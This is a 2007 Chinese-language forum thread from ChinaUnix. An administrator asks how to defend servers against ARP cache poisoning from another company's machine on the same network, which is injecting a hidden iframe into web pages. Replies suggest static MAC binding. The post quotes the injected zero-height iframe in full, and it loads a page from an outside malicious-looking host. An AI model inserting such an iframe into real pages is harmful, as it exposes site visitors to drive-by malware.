免费注册 查看新帖 |

Chinaunix

  平台 论坛 博客 文库
最近访问板块 发新帖
查看: 2446 | 回复: 3
打印 上一主题 下一主题

[网络管理] 求救服务器主动防制ARP病毒 [复制链接]

论坛徽章:
0
跳转到指定楼层
1 [收藏(0)] [报告]
发表于 2007-10-19 11:14 |只看该作者 |倒序浏览
各位好,小弟有几台服务器中了ARP病毒,请问服务器怎么主动防制,主要是有一台服务器在向外提供WEB服务,被自动加入<iframe src=http://k1818k.com/soft6/index.htm width=20 height=0 frameborder=0></iframe> 代码,导致有框架(frame)没法使用。

具体如下:
服务器所在网络是通过一个cisco pix(网关,防火墙)上外网,其中一台服务器提供WEB服务,网站页面使用了框架(frame);
原因可以确认网络中其中一台服务器(这台服务器非我们能管的,是其他公司的)向网络内发ARP病毒,导致用户访问我们的WEB服务时,自动加入上面的iframe 代码。断开这台服务器就可以正常;
我们的服务器已经做了静态绑定了网关的mac地址,所以没有导致外网络不通;

需要解决:
能否有什么办法在自己的服务器上主动防制这个arp病毒,网关不能主动绑定我们服务器的MAC地址.
或网页有什么办法让iframe代码不生效。这次可以让用户可以正常使用WEB服务,只是有病毒而也。

谢谢!

论坛徽章:
5
IT运维版块每日发帖之星
日期:2015-08-06 06:20:00IT运维版块每日发帖之星
日期:2015-08-10 06:20:00IT运维版块每日发帖之星
日期:2015-08-23 06:20:00IT运维版块每日发帖之星
日期:2015-08-24 06:20:00IT运维版块每日发帖之星
日期:2015-11-12 06:20:00
2 [报告]
发表于 2007-10-19 14:01 |只看该作者
所有的机器关掉ARP协议,全部静态绑定。

论坛徽章:
0
3 [报告]
发表于 2007-10-19 15:36 |只看该作者
谢谢!
我服务器组(多台服务器,如数据库等,邮件),之间要相互通信的,如果关掉ARP协议的话,之间还能通信吗?
全部静态绑定-是我绑网关就行了吗?还要网关将我服务器MAC也绑(现在就是这步比较麻烦,网关没法绑我服务器的MAC,只有服务器绑网关的)

论坛徽章:
0
4 [报告]
发表于 2007-10-19 15:37 |只看该作者
我从网上查到是ARP缓存污染(cache poison)加上IFrame 嵌入(Injection)的攻击,但都没有说具体的解决方法。
您需要登录后才可以回帖 登录 | 注册

本版积分规则 发表回复

  

北京盛拓优讯信息技术有限公司. 版权所有 京ICP备16024965号-6 北京市公安局海淀分局网监中心备案编号:11010802020122 niuxiaotong@pcpop.com 17352615567
未成年举报专区
中国互联网协会会员  联系我们:huangweiwei@itpub.net
感谢所有关心和支持过ChinaUnix的朋友们 转载本站内容请注明原作者名及出处

清除 Cookies - ChinaUnix - Archiver - WAP - TOP